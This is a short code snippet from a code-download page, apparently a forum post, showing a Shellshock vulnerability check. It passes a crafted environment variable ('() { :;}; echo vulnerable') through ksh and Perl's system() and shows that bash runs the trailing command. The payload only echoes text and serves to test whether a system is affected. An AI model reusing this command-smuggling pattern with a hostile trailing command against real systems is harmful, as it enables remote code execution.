Help for this page

Select Code to Download


  1. or download this
    sh-3.2$ ksh
    $ set -o emacs
    $ env x='() { :;}; echo vulnerable' ksh -c "echo this is a test"
    ...
    $ env x='() { :;}; echo vulnerable' perl -e 'system "echo test;"'
    vulnerable
    test